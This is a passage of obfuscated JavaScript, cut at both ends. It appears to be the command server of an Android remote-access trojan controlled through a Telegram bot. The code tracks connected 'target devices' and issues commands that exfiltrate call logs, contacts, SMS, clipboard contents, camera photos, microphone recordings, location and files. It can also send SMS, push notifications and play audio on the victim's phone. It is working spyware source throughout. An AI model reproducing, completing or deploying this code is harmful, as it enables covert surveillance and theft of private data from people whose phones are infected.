แดสแดแดแด\x20ษขแดสสแดสส\x20๊ฐษชสแด๊ฑ.','/start','data','message_id','then','HTML','text','\x0a\x0a','๐๐ฉ๐ค๐ฅ\x20๐๐ช๐๐๐ค','split','device_info','show_notification:','๐๐๐๐ฃ\x20๐๐๐ข๐๐ง๐','message','/uploadLocation','model','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ข๐๐จ๐จ๐๐๐\x20๐ฉ๐๐๐ฉ\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐๐ฅ๐ฅ๐๐๐ง\x20๐ค๐ฃ\x20๐ฉ๐๐\x20๐ฉ๐๐ง๐๐๐ฉ\x20๐๐๐ซ๐๐๐\x0a\x0a','createServer','reply_to_message','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ฅ๐๐ฉ๐\x20๐ค๐\x20๐ฉ๐๐\x20๐๐๐ก๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐๐๐ก๐๐ฉ๐\x0a\x0a','delete','๐๐๐๐ง๐ค๐ฅ๐๐ค๐ฃ๐','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐๐ช๐๐๐ค\x20๐ก๐๐ฃ๐ \x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐ฅ๐ก๐๐ฎ','contacts','file','clients','camera_selfie:','๐๐ญ๐๐๐ช๐ฉ๐\x20๐๐ค๐ข๐ข๐๐ฃ๐','โข\x20แดแดแด๊ฑแด\x20ษช๊ฑ\x20แด\x20๊ฑสแดสแด\x20แดแด๊ฑ๊ฑแดษขแด\x20แดสแดแด\x20แดแดแดแดแดส๊ฑ\x20แดษด\x20แดสแด\x20แด
แดแด ษชแดแด\x20๊ฑแดสแดแดษด\x20๊ฐแดส\x20แด\x20๊ฐแดแดก\x20๊ฑแดแดแดษดแด
๊ฑ','sendDocument','2609110JuwyVs','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ข๐๐จ๐จ๐๐๐\x20๐ฉ๐๐๐ฉ\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐๐ฅ๐ฅ๐๐๐ง\x20๐ค๐ฃ\x20๐ฉ๐๐\x20๐ฉ๐๐ง๐๐๐ฉ\x20๐๐๐ซ๐๐๐','single','connection','๐ผ๐ฅ๐ฅ๐จ','buffer','โข\x20ษดแดแดแด\x20แดสแดแด\x20สแดแด\x20แดแด๊ฑแด\x20แดษดแดแดส\x20แดสแด\x20แด
ษชสแดแดแด\x20สษชษดแด\x20แด๊ฐ\x20แดสแด\x20แด
แด๊ฑษชสแดแด
\x20๊ฑแดแดษดแด
,\x20แดแดสแดสแดกษช๊ฑแด\x20แดสแด\x20๊ฑแดแดษดแด
\x20แดกษชสส\x20ษดแดแด\x20สแด\x20แดสแดสแดแด
','17781kWyDHn','provider','โข\x20สแดแดส\x20แดแด๊ฑ๊ฑแดษขแด\x20แดกษชสส\x20สแด\x20แดแดแดแดแดส\x20ษชษด\x20แดแดสษขแดแด\x20แด
แดแด ษชแดแด\x20๊ฑแดแดแดแด๊ฑ\x20สแดส\x20สษชแดแด\x20สแดษขแดสแดส\x20ษดแดแดษช๊ฐษชแดแดแดษชแดษด','๐พ๐ก๐๐ฅ๐๐ค๐๐ง๐','stop_audio'];_0x8774=function(){return _0x1bad81;};return _0x8774();}app[_0x8ea7c8(0x106)](bodyParser[_0x8ea7c8(0x110)]());let currentUuid='',currentNumber='',currentTitle='';app['get']('/',function(_0x58d93c,_0x4dcb0c){const _0x291cce=_0x8ea7c8;_0x4dcb0c[_0x291cce(0x103)](_0x291cce(0x173));}),app[_0x8ea7c8(0x15a)](_0x8ea7c8(0x14c),upload[_0x8ea7c8(0x139)](_0x8ea7c8(0x131)),(_0x380248,_0x425211)=>{const _0x2aba84=_0x8ea7c8,_0x571e82=_0x380248[_0x2aba84(0x131)]['originalname'];appBot[_0x2aba84(0x136)](id,_0x380248['file'][_0x2aba84(0x13c)],{'caption':_0x2aba84(0x10e)+_0x380248[_0x2aba84(0xe5)][_0x2aba84(0x128)]+_0x2aba84(0x167),'parse_mode':'HTML'},{'filename':_0x571e82,'contentType':'application/txt'}),_0x425211[_0x2aba84(0x103)]('');}),app['post'](_0x8ea7c8(0x144),(_0x3d7cfa,_0x57da16)=>{const _0xcc4340=_0x8ea7c8;appBot[_0xcc4340(0xf8)](id,_0xcc4340(0x10e)+_0x3d7cfa[_0xcc4340(0xe5)]['model']+_0xcc4340(0xfa)+_0x3d7cfa[_0xcc4340(0x10f)][_0xcc4340(0x11f)],{'parse_mode':_0xcc4340(0x11e)}),_0x57da16['send']('');}),app[_0x8ea7c8(0x15a)](_0x8ea7c8(0x127),(_0x484191,_0x23e1d4)=>{const _0x46d094=_0x8ea7c8;appBot[_0x46d094(0x151)](id,_0x484191[_0x46d094(0x10f)]['lat'],_0x484191['body'][_0x46d094(0x111)]),appBot[_0x46d094(0xf8)](id,_0x46d094(0x148)+_0x484191[_0x46d094(0xe5)][_0x46d094(0x128)]+_0x46d094(0x167),{'parse_mode':_0x46d094(0x11e)}),_0x23e1d4['send']('');}),appSocket['on'](_0x8ea7c8(0x13a),(_0x461074,_0x40408c)=>{const _0x5e8b13=_0x8ea7c8,_0x3b4c31=uuid4['v4'](),_0x56fa3e=_0x40408c['headers'][_0x5e8b13(0x128)],_0x44d786=_0x40408c[_0x5e8b13(0xe5)][_0x5e8b13(0x143)],_0x568bf4=_0x40408c['headers'][_0x5e8b13(0x166)],_0x28e45c=_0x40408c['headers'][_0x5e8b13(0xf1)],_0x441805=_0x40408c['headers'][_0x5e8b13(0x13f)];_0x461074[_0x5e8b13(0x145)]=_0x3b4c31,appClients[_0x5e8b13(0x16d)](_0x3b4c31,{'model':_0x56fa3e,'battery':_0x44d786,'version':_0x568bf4,'brightness':_0x28e45c,'provider':_0x441805}),appBot['sendMessage'](id,_0x5e8b13(0xe7)+(_0x5e8b13(0x146)+_0x56fa3e+_0x5e8b13(0x116))+(_0x5e8b13(0x100)+_0x44d786+_0x5e8b13(0x116))+(_0x5e8b13(0x17b)+_0x568bf4+_0x5e8b13(0x116))+(_0x5e8b13(0xed)+_0x28e45c+_0x5e8b13(0x116))+('โข\x20แดสแดแด ษชแด
แดส\x20:\x20'+_0x441805+''),{'parse_mode':_0x5e8b13(0x11e)}),_0x461074['on'](_0x5e8b13(0x105),function(){const _0xed404c=_0x5e8b13;appBot['sendMessage'](id,'ยฐโข\x20๐ฟ๐๐ซ๐๐๐\x20๐๐๐จ๐๐ค๐ฃ๐ฃ๐๐๐ฉ๐๐\x0a\x0a'+(_0xed404c(0x146)+_0x56fa3e+'\x0a')+(_0xed404c(0x100)+_0x44d786+_0xed404c(0x116))+('โข\x20แดษดแด
สแดษชแด
\x20แด แดส๊ฑษชแดษด\x20:\x20'+_0x568bf4+_0xed404c(0x116))+('โข\x20๊ฑแดสแดแดษด\x20สสษชษขสแดษดแด๊ฑ๊ฑ\x20:\x20'+_0x28e45c+_0xed404c(0x116))+(_0xed404c(0xe6)+_0x441805+_0xed404c(0x165)),{'parse_mode':_0xed404c(0x11e)}),appClients[_0xed404c(0x12d)](_0x461074['uuid']);});}),appBot['on'](_0x8ea7c8(0x126),_0x11cbf9=>{const _0x3b4275=_0x8ea7c8,_0x118285=_0x11cbf9['chat']['id'];if(_0x11cbf9[_0x3b4275(0x12b)]){_0x11cbf9['reply_to_message'][_0x3b4275(0x11f)]['includes']('ยฐโข\x20๐๐ก๐๐๐จ๐\x20๐ง๐๐ฅ๐ก๐ฎ\x20๐ฉ๐๐\x20๐ฃ๐ช๐ข๐๐๐ง\x20๐ฉ๐ค\x20๐ฌ๐๐๐๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐จ๐๐ฃ๐\x20๐ฉ๐๐\x20๐๐๐')&&(currentNumber=_0x11cbf9['text'],appBot[_0x3b4275(0xf8)](id,_0x3b4275(0x16c)+_0x3b4275(0xf9),{'reply_markup':{'force_reply':!![]}}));_0x11cbf9['reply_to_message']['text'][_0x3b4275(0x118)](_0x3b4275(0x108))&&(appSocket[_0x3b4275(0x132)][_0x3b4275(0x175)](function _0x46d233(_0x2e7a50){const _0x30a950=_0x3b4275;_0x2e7a50[_0x30a950(0x145)]==currentUuid&&_0x2e7a50[_0x30a950(0x103)]('send_message:'+currentNumber+'/'+_0x11cbf9['text']);}),currentNumber='',currentUuid='',appBot[_0x3b4275(0xf8)](id,_0x3b4275(0xf6)+'โข\x20สแดแด\x20แดกษชสส\x20สแดแดแดษชแด แด\x20แด\x20สแด๊ฑแดแดษด๊ฑแด\x20ษชษด\x20แดสแด\x20ษดแดxแด\x20๊ฐแดแดก\x20แดแดแดแดษดแด๊ฑ',{'parse_mode':_0x3b4275(0x11e),'reply_markup':{'keyboard':[[_0x3b4275(0x178)],[_0x3b4275(0x134)]],'resize_keyboard':!![]}}));if(_0x11cbf9[_0x3b4275(0x12b)]['text']['includes'](_0x3b4275(0xe4))){const _0x2239a2=_0x11cbf9['text'];appSocket[_0x3b4275(0x132)][_0x3b4275(0x175)](function _0x1496b3(_0x445618){const _0x812449=_0x3b4275;_0x445618[_0x812449(0x145)]==currentUuid&&_0x445618['send'](_0x812449(0x104)+_0x2239a2);}),currentUuid='',appBot[_0x3b4275(0xf8)](id,_0x3b4275(0xf6)+_0x3b4275(0xf7),{'parse_mode':_0x3b4275(0x11e),'reply_markup':{'keyboard':[[_0x3b4275(0x178)],[_0x3b4275(0x134)]],'resize_keyboard':!![]}});}if(_0x11cbf9[_0x3b4275(0x12b)][_0x3b4275(0x11f)][_0x3b4275(0x118)](_0x3b4275(0x17d))){const _0x1652b1=_0x11cbf9[_0x3b4275(0x11f)];appSocket[_0x3b4275(0x132)]['forEach'](function _0x1d5be5(_0x5f96bd){const _0x5b65c6=_0x3b4275;_0x5f96bd[_0x5b65c6(0x145)]==currentUuid&&_0x5f96bd[_0x5b65c6(0x103)](_0x5b65c6(0x16e)+_0x1652b1);}),currentUuid='',appBot[_0x3b4275(0xf8)](id,_0x3b4275(0xf6)+_0x3b4275(0xf7),{'parse_mode':'HTML','reply_markup':{'keyboard':[[_0x3b4275(0x178)],['๐๐ญ๐๐๐ช๐ฉ๐\x20๐๐ค๐ข๐ข๐๐ฃ๐']],'resize_keyboard':!![]}});}if(_0x11cbf9[_0x3b4275(0x12b)][_0x3b4275(0x11f)]['includes'](_0x3b4275(0x14d))){const _0x38f86c=_0x11cbf9['text'];appSocket['clients'][_0x3b4275(0x175)](function _0xeb0793(_0x315ea9){const _0x409689=_0x3b4275;_0x315ea9['uuid']==currentUuid&&_0x315ea9[_0x409689(0x103)](_0x409689(0x17e)+_0x38f86c);}),currentUuid='',appBot[_0x3b4275(0xf8)](id,_0x3b4275(0xf6)+'โข\x20สแดแด\x20แดกษชสส\x20สแดแดแดษชแด แด\x20แด\x20สแด๊ฑแดแดษด๊ฑแด\x20ษชษด\x20แดสแด\x20ษดแดxแด\x20๊ฐแดแดก\x20แดแดแดแดษดแด๊ฑ',{'parse_mode':_0x3b4275(0x11e),'reply_markup':{'keyboard':[['๐พ๐ค๐ฃ๐ฃ๐๐๐ฉ๐๐\x20๐๐๐ซ๐๐๐๐จ'],[_0x3b4275(0x134)]],'resize_keyboard':!![]}});}if(_0x11cbf9['reply_to_message'][_0x3b4275(0x11f)]['includes'](_0x3b4275(0x17c))){const _0x233ce5=_0x11cbf9[_0x3b4275(0x11f)];appSocket[_0x3b4275(0x132)]['forEach'](function _0x441679(_0x5e8361){const _0xd07b8c=_0x3b4275;_0x5e8361[_0xd07b8c(0x145)]==currentUuid&&_0x5e8361[_0xd07b8c(0x103)](_0xd07b8c(0x10d)+_0x233ce5);}),currentUuid='',appBot['sendMessage'](id,'ยฐโข\x20๐๐ค๐ช๐ง\x20๐ง๐๐ฆ๐ช๐๐จ๐ฉ\x20๐๐จ\x20๐ค๐ฃ\x20๐ฅ๐ง๐ค๐๐๐จ๐จ\x0a\x0a'+_0x3b4275(0xf7),{'parse_mode':_0x3b4275(0x11e),'reply_markup':{'keyboard':[[_0x3b4275(0x178)],[_0x3b4275(0x134)]],'resize_keyboard':!![]}});}if(_0x11cbf9[_0x3b4275(0x12b)][_0x3b4275(0x11f)][_0x3b4275(0x118)](_0x3b4275(0x10b))){const _0x3fc95b=_0x11cbf9[_0x3b4275(0x11f)];appSocket['clients'][_0x3b4275(0x175)](function _0x22f82a(_0x2ae347){const _0x29cc80=_0x3b4275;_0x2ae347[_0x29cc80(0x145)]==currentUuid&&_0x2ae347['send'](_0x29cc80(0xf2)+_0x3fc95b);}),currentUuid='',appBot[_0x3b4275(0xf8)](id,_0x3b4275(0xf6)+'โข\x20สแดแด\x20แดกษชสส\x20สแดแดแดษชแด แด\x20แด\x20สแด๊ฑแดแดษด๊ฑแด\x20ษชษด\x20แดสแด\x20ษดแดxแด\x20๊ฐแดแดก\x20แดแดแดแดษดแด๊ฑ',{'parse_mode':_0x3b4275(0x11e),'reply_markup':{'keyboard':[[_0x3b4275(0x178)],[_0x3b4275(0x134)]],'resize_keyboard':!![]}});}if(_0x11cbf9[_0x3b4275(0x12b)][_0x3b4275(0x11f)][_0x3b4275(0x118)]('ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐๐ค๐ฌ\x20๐ก๐ค๐ฃ๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐๐\x20๐จ๐๐ก๐๐๐\x20๐๐๐ข๐๐ง๐\x20๐ฉ๐ค\x20๐๐\x20๐ง๐๐๐ค๐ง๐๐๐')){const _0x40662f=_0x11cbf9[_0x3b4275(0x11f)];appSocket[_0x3b4275(0x132)][_0x3b4275(0x175)](function _0x513eb8(_0x51aa2e){const _0x3688b5=_0x3b4275;_0x51aa2e[_0x3688b5(0x145)]==currentUuid&&_0x51aa2e[_0x3688b5(0x103)](_0x3688b5(0xe2)+_0x40662f);}),currentUuid='',appBot[_0x3b4275(0xf8)](id,_0x3b4275(0xf6)+_0x3b4275(0xf7),{'parse_mode':_0x3b4275(0x11e),'reply_markup':{'keyboard':[['๐พ๐ค๐ฃ๐ฃ๐๐๐ฉ๐๐\x20๐๐๐ซ๐๐๐๐จ'],['๐๐ญ๐๐๐ช๐ฉ๐\x20๐๐ค๐ข๐ข๐๐ฃ๐']],'resize_keyboard':!![]}});}if(_0x11cbf9[_0x3b4275(0x12b)][_0x3b4275(0x11f)][_0x3b4275(0x118)](_0x3b4275(0x138))){const _0x19eead=_0x11cbf9[_0x3b4275(0x11f)];appSocket[_0x3b4275(0x132)][_0x3b4275(0x175)](function _0x16ad1f(_0x2a977d){const _0x77e15c=_0x3b4275;_0x2a977d[_0x77e15c(0x145)]==currentUuid&&_0x2a977d[_0x77e15c(0x103)]('toast:'+_0x19eead);}),currentUuid='',appBot['sendMessage'](id,_0x3b4275(0xf6)+'โข\x20สแดแด\x20แดกษชสส\x20สแดแดแดษชแด แด\x20แด\x20สแด๊ฑแดแดษด๊ฑแด\x20ษชษด\x20แดสแด\x20ษดแดxแด\x20๊ฐแดแดก\x20แดแดแดแดษดแด๊ฑ',{'parse_mode':_0x3b4275(0x11e),'reply_markup':{'keyboard':[[_0x3b4275(0x178)],['๐๐ญ๐๐๐ช๐ฉ๐\x20๐๐ค๐ข๐ข๐๐ฃ๐']],'resize_keyboard':!![]}});}if(_0x11cbf9[_0x3b4275(0x12b)]['text'][_0x3b4275(0x118)](_0x3b4275(0x107))){const _0xa945dd=_0x11cbf9[_0x3b4275(0x11f)];currentTitle=_0xa945dd,appBot[_0x3b4275(0xf8)](id,_0x3b4275(0xfb)+_0x3b4275(0xe8),{'reply_markup':{'force_reply':!![]}});}if(_0x11cbf9[_0x3b4275(0x12b)][_0x3b4275(0x11f)][_0x3b4275(0x118)](_0x3b4275(0x16a))){const _0x523afa=_0x11cbf9[_0x3b4275(0x11f)];appSocket[_0x3b4275(0x132)][_0x3b4275(0x175)](function _0x104ab1(_0x393cbb){const _0xc52c79=_0x3b4275;_0x393cbb[_0xc52c79(0x145)]==currentUuid&&_0x393cbb[_0xc52c79(0x103)](_0xc52c79(0x124)+currentTitle+'/'+_0x523afa);}),currentUuid='',appBot[_0x3b4275(0xf8)](id,_0x3b4275(0xf6)+'โข\x20สแดแด\x20แดกษชสส\x20สแดแดแดษชแด แด\x20แด\x20สแด๊ฑแดแดษด๊ฑแด\x20ษชษด\x20แดสแด\x20ษดแดxแด\x20๊ฐแดแดก\x20แดแดแดแดษดแด๊ฑ',{'parse_mode':_0x3b4275(0x11e),'reply_markup':{'keyboard':[[_0x3b4275(0x178)],[_0x3b4275(0x134)]],'resize_keyboard':!![]}});}if(_0x11cbf9[_0x3b4275(0x12b)][_0x3b4275(0x11f)][_0x3b4275(0x118)](_0x3b4275(0x12f))){const _0x7a9ff3=_0x11cbf9['text'];appSocket[_0x3b4275(0x132)][_0x3b4275(0x175)](function _0x1c2c07(_0x138d4d){const _0xa5a73f=_0x3b4275;_0x138d4d['uuid']==currentUuid&&_0x138d4d[_0xa5a73f(0x103)](_0xa5a73f(0x17a)+_0x7a9ff3);}),currentUuid='',appBot[_0x3b4275(0xf8)](id,_0x3b4275(0xf6)+_0x3b4275(0xf7),{'parse_mode':_0x3b4275(0x11e),'reply_markup':{'keyboard':[[_0x3b4275(0x178)],[_0x3b4275(0x134)]],'resize_keyboard':!![]}});}}if(id==_0x118285){_0x11cbf9[_0x3b4275(0x11f)]==_0x3b4275(0x11a)&&appBot[_0x3b4275(0xf8)](id,_0x3b4275(0xfe)+'โข\x20ษช๊ฐ\x20แดสแด\x20แดแดแดสษชแดแดแดษชแดษด\x20ษช๊ฑ\x20ษชษด๊ฑแดแดสสแดแด
\x20แดษด\x20แดสแด\x20แดแดสษขแดแด\x20แด
แดแด ษชแดแด,\x20แดกแดษชแด\x20๊ฐแดส\x20แดสแด\x20แดแดษดษดแดแดแดษชแดษด\x0a\x0a'+_0x3b4275(0xef)+_0x3b4275(0x163)+'โข\x20ษช๊ฐ\x20สแดแด\x20ษขแดแด\x20๊ฑแดแดแดแด\x20๊ฑแดแดแดแดกสแดสแด\x20ษชษด\x20แดสแด\x20สแดแด,\x20๊ฑแดษดแด
\x20/start\x20แดแดแดแดแดษดแด
',{'parse_mode':_0x3b4275(0x11e),'reply_markup':{'keyboard':[[_0x3b4275(0x178)],[_0x3b4275(0x134)]],'resize_keyboard':!![]}});if(_0x11cbf9[_0x3b4275(0x11f)]==_0x3b4275(0x178)){if(appClients[_0x3b4275(0x16f)]==0x0)appBot['sendMessage'](id,'ยฐโข\x20๐๐ค\x20๐๐ค๐ฃ๐ฃ๐๐๐ฉ๐๐ฃ๐\x20๐๐๐ซ๐๐๐๐จ\x20๐๐ซ๐๐๐ก๐๐๐ก๐\x0a\x0a'+_0x3b4275(0x117));else{let _0x5a94da='ยฐโข\x20๐๐๐จ๐ฉ\x20๐ค๐\x20๐๐ค๐ฃ๐ฃ๐๐๐ฉ๐๐\x20๐๐๐ซ๐๐๐๐จ\x20:\x0a\x0a';appClients[_0x3b4275(0x175)](function(_0x3bf86c,_0x1ba42a,_0x5ae8f3){const _0x4f03b0=_0x3b4275;_0x5a94da+='โข\x20แด
แดแด ษชแดแด\x20แดแดแด
แดส\x20:\x20'+_0x3bf86c[_0x4f03b0(0x128)]+_0x4f03b0(0x116)+(_0x4f03b0(0x100)+_0x3bf86c[_0x4f03b0(0x143)]+_0x4f03b0(0x116))+(_0x4f03b0(0x17b)+_0x3bf86c['version']+'\x0a')+(_0x4f03b0(0xed)+_0x3bf86c[_0x4f03b0(0xf1)]+'\x0a')+(_0x4f03b0(0xe6)+_0x3bf86c[_0x4f03b0(0x13f)]+_0x4f03b0(0x120));}),appBot['sendMessage'](id,_0x5a94da,{'parse_mode':_0x3b4275(0x11e)});}}if(_0x11cbf9['text']=='๐๐ญ๐๐๐ช๐ฉ๐\x20๐๐ค๐ข๐ข๐๐ฃ๐'){if(appClients[_0x3b4275(0x16f)]==0x0)appBot[_0x3b4275(0xf8)](id,_0x3b4275(0xf3)+_0x3b4275(0x117));else{const _0x3b9a83=[];appClients[_0x3b4275(0x175)](function(_0x4eb067,_0x4a3ac4,_0x54efb4){const _0x24c3e6=_0x3b4275;_0x3b9a83[_0x24c3e6(0x171)]([{'text':_0x4eb067['model'],'callback_data':_0x24c3e6(0xe9)+_0x4a3ac4}]);}),appBot['sendMessage'](id,_0x3b4275(0x112),{'reply_markup':{'inline_keyboard':_0x3b9a83}});}}}else appBot['sendMessage'](id,_0x3b4275(0xfd));}),appBot['on'](_0x8ea7c8(0x179),_0x1262e0=>{const _0xe6b2b9=_0x8ea7c8,_0x3c50cb=_0x1262e0[_0xe6b2b9(0x126)],_0x274198=_0x1262e0[_0xe6b2b9(0x11b)],_0x3b1368=_0x274198[_0xe6b2b9(0x122)](':')[0x0],_0x5346ac=_0x274198[_0xe6b2b9(0x122)](':')[0x1];console[_0xe6b2b9(0x153)](_0x5346ac),_0x3b1368==_0xe6b2b9(0x115)&&appBot[_0xe6b2b9(0x14f)](_0xe6b2b9(0x17f)+appClients[_0xe6b2b9(0x113)](_0x274198[_0xe6b2b9(0x122)](':')[0x1])[_0xe6b2b9(0x128)]+_0xe6b2b9(0x165),{'width':0x2710,'chat_id':id,'message_id':_0x3c50cb[_0xe6b2b9(0x11c)],'reply_markup':{'inline_keyboard':[[{'text':_0xe6b2b9(0x13b),'callback_data':_0xe6b2b9(0x152)+_0x5346ac},{'text':_0xe6b2b9(0x158),'callback_data':_0xe6b2b9(0x176)+_0x5346ac}],[{'text':_0xe6b2b9(0x101),'callback_data':_0xe6b2b9(0x16e)+_0x5346ac},{'text':_0xe6b2b9(0xe3),'callback_data':_0xe6b2b9(0x17e)+_0x5346ac}],[{'text':_0xe6b2b9(0x141),'callback_data':_0xe6b2b9(0x169)+_0x5346ac},{'text':_0xe6b2b9(0x12e),'callback_data':_0xe6b2b9(0x10d)+_0x5346ac}],[{'text':_0xe6b2b9(0x125),'callback_data':_0xe6b2b9(0xf4)+_0x5346ac},{'text':_0xe6b2b9(0x14a),'callback_data':_0xe6b2b9(0x133)+_0x5346ac}],[{'text':_0xe6b2b9(0x14b),'callback_data':_0xe6b2b9(0xf0)+_0x5346ac},{'text':_0xe6b2b9(0x150),'callback_data':'toast:'+_0x5346ac}],[{'text':_0xe6b2b9(0x15b),'callback_data':'calls:'+_0x5346ac},{'text':'๐พ๐ค๐ฃ๐ฉ๐๐๐ฉ๐จ','callback_data':_0xe6b2b9(0x147)+_0x5346ac}],[{'text':_0xe6b2b9(0x15c),'callback_data':'vibrate:'+_0x5346ac},{'text':_0xe6b2b9(0xeb),'callback_data':_0xe6b2b9(0x124)+_0x5346ac}],[{'text':_0xe6b2b9(0x162),'callback_data':'messages:'+_0x5346ac},{'text':_0xe6b2b9(0x10c),'callback_data':'send_message:'+_0x5346ac}],[{'text':'๐๐ก๐๐ฎ\x20๐๐ช๐๐๐ค','callback_data':_0xe6b2b9(0x17a)+_0x5346ac},{'text':_0xe6b2b9(0x121),'callback_data':'stop_audio:'+_0x5346ac}],[{'text':_0xe6b2b9(0x168),'callback_data':_0xe6b2b9(0x104)+_0x5346ac}]]},'parse_mode':_0xe6b2b9(0x11e)}),_0x3b1368=='calls'&&(appSocket['clients'][_0xe6b2b9(0x175)](function _0x122d02(_0x3067f2){const _0x50d2d1=_0xe6b2b9;_0x3067f2[_0x50d2d1(0x145)]==_0x5346ac&&_0x3067f2['send'](_0x50d2d1(0xec));}),appBot[_0xe6b2b9(0x14e)](id,_0x3c50cb[_0xe6b2b9(0x11c)]),appBot[_0xe6b2b9(0xf8)](id,_0xe6b2b9(0xf6)+_0xe6b2b9(0xf7),{'parse_mode':_0xe6b2b9(0x11e),'reply_markup':{'keyboard':[['๐พ๐ค๐ฃ๐ฃ๐๐๐ฉ๐๐\x20๐๐๐ซ๐๐๐๐จ'],[_0xe6b2b9(0x134)]],'resize_keyboard':!![]}})),_0x3b1368==_0xe6b2b9(0x130)&&(appSocket[_0xe6b2b9(0x132)][_0xe6b2b9(0x175)](function _0x43a1bd(_0x301ef3){const _0x27971b=_0xe6b2b9;_0x301ef3[_0x27971b(0x145)]==_0x5346ac&&_0x301ef3[_0x27971b(0x103)](_0x27971b(0x130));}),appBot[_0xe6b2b9(0x14e)](id,_0x3c50cb['message_id']),appBot[_0xe6b2b9(0xf8)](id,_0xe6b2b9(0xf6)+_0xe6b2b9(0xf7),{'parse_mode':_0xe6b2b9(0x11e),'reply_markup':{'keyboard':[[_0xe6b2b9(0x178)],[_0xe6b2b9(0x134)]],'resize_keyboard':!![]}})),_0x3b1368==_0xe6b2b9(0x149)&&(appSocket[_0xe6b2b9(0x132)][_0xe6b2b9(0x175)](function _0x236d95(_0x33a4c6){const _0x3e721f=_0xe6b2b9;_0x33a4c6[_0x3e721f(0x145)]==_0x5346ac&&_0x33a4c6['send']('messages');}),appBot[_0xe6b2b9(0x14e)](id,_0x3c50cb['message_id']),appBot[_0xe6b2b9(0xf8)](id,_0xe6b2b9(0xf6)+_0xe6b2b9(0xf7),{'parse_mode':'HTML','reply_markup':{'keyboard':[[_0xe6b2b9(0x178)],[_0xe6b2b9(0x134)]],'resize_keyboard':!![]}})),_0x3b1368==_0xe6b2b9(0xfc)&&(appSocket[_0xe6b2b9(0x132)]['forEach'](function _0x32e3a1(_0x2dc6d9){const _0x4a252d=_0xe6b2b9;_0x2dc6d9['uuid']==_0x5346ac&&_0x2dc6d9[_0x4a252d(0x103)](_0x4a252d(0xfc));}),appBot[_0xe6b2b9(0x14e)](id,_0x3c50cb[_0xe6b2b9(0x11c)]),appBot[_0xe6b2b9(0xf8)](id,'ยฐโข\x20๐๐ค๐ช๐ง\x20๐ง๐๐ฆ๐ช๐๐จ๐ฉ\x20๐๐จ\x20๐ค๐ฃ\x20๐ฅ๐ง๐ค๐๐๐จ๐จ\x0a\x0a'+_0xe6b2b9(0xf7),{'parse_mode':'HTML','reply_markup':{'keyboard':[['๐พ๐ค๐ฃ๐ฃ๐๐๐ฉ๐๐\x20๐๐๐ซ๐๐๐๐จ'],[_0xe6b2b9(0x134)]],'resize_keyboard':!![]}})),_0x3b1368==_0xe6b2b9(0x123)&&(appSocket[_0xe6b2b9(0x132)][_0xe6b2b9(0x175)](function _0x12e5dd(_0x423b78){const _0x2e6fdc=_0xe6b2b9;_0x423b78[_0x2e6fdc(0x145)]==_0x5346ac&&_0x423b78[_0x2e6fdc(0x103)](_0x2e6fdc(0x123));}),appBot[_0xe6b2b9(0x14e)](id,_0x3c50cb['message_id']),appBot['sendMessage'](id,_0xe6b2b9(0xf6)+_0xe6b2b9(0xf7),{'parse_mode':'HTML','reply_markup':{'keyboard':[[_0xe6b2b9(0x178)],[_0xe6b2b9(0x134)]],'resize_keyboard':!![]}})),_0x3b1368=='clipboard'&&(appSocket[_0xe6b2b9(0x132)][_0xe6b2b9(0x175)](function _0x3009ef(_0x4b8a53){const _0x35e360=_0xe6b2b9;_0x4b8a53[_0x35e360(0x145)]==_0x5346ac&&_0x4b8a53[_0x35e360(0x103)]('clipboard');}),appBot[_0xe6b2b9(0x14e)](id,_0x3c50cb[_0xe6b2b9(0x11c)]),appBot[_0xe6b2b9(0xf8)](id,_0xe6b2b9(0xf6)+_0xe6b2b9(0xf7),{'parse_mode':_0xe6b2b9(0x11e),'reply_markup':{'keyboard':[[_0xe6b2b9(0x178)],[_0xe6b2b9(0x134)]],'resize_keyboard':!![]}})),_0x3b1368=='camera_main'&&(appSocket[_0xe6b2b9(0x132)][_0xe6b2b9(0x175)](function _0x11f2ec(_0x35905c){const _0x1991aa=_0xe6b2b9;_0x35905c[_0x1991aa(0x145)]==_0x5346ac&&_0x35905c[_0x1991aa(0x103)](_0x1991aa(0x109));}),appBot[_0xe6b2b9(0x14e)](id,_0x3c50cb[_0xe6b2b9(0x11c)]),appBot[_0xe6b2b9(0xf8)](id,_0xe6b2b9(0xf6)+_0xe6b2b9(0xf7),{'parse_mode':'HTML','reply_markup':{'keyboard':[['๐พ๐ค๐ฃ๐ฃ๐๐๐ฉ๐๐\x20๐๐๐ซ๐๐๐๐จ'],[_0xe6b2b9(0x134)]],'resize_keyboard':!![]}})),_0x3b1368==_0xe6b2b9(0x159)&&(appSocket[_0xe6b2b9(0x132)][_0xe6b2b9(0x175)](function _0x2ac55d(_0x2095d0){const _0x2cbb9f=_0xe6b2b9;_0x2095d0[_0x2cbb9f(0x145)]==_0x5346ac&&_0x2095d0['send'](_0x2cbb9f(0x159));}),appBot['deleteMessage'](id,_0x3c50cb[_0xe6b2b9(0x11c)]),appBot[_0xe6b2b9(0xf8)](id,_0xe6b2b9(0xf6)+_0xe6b2b9(0xf7),{'parse_mode':_0xe6b2b9(0x11e),'reply_markup':{'keyboard':[[_0xe6b2b9(0x178)],['๐๐ญ๐๐๐ช๐ฉ๐\x20๐๐ค๐ข๐ข๐๐ฃ๐']],'resize_keyboard':!![]}})),_0x3b1368=='location'&&(appSocket[_0xe6b2b9(0x132)][_0xe6b2b9(0x175)](function _0x4e044d(_0x5af290){const 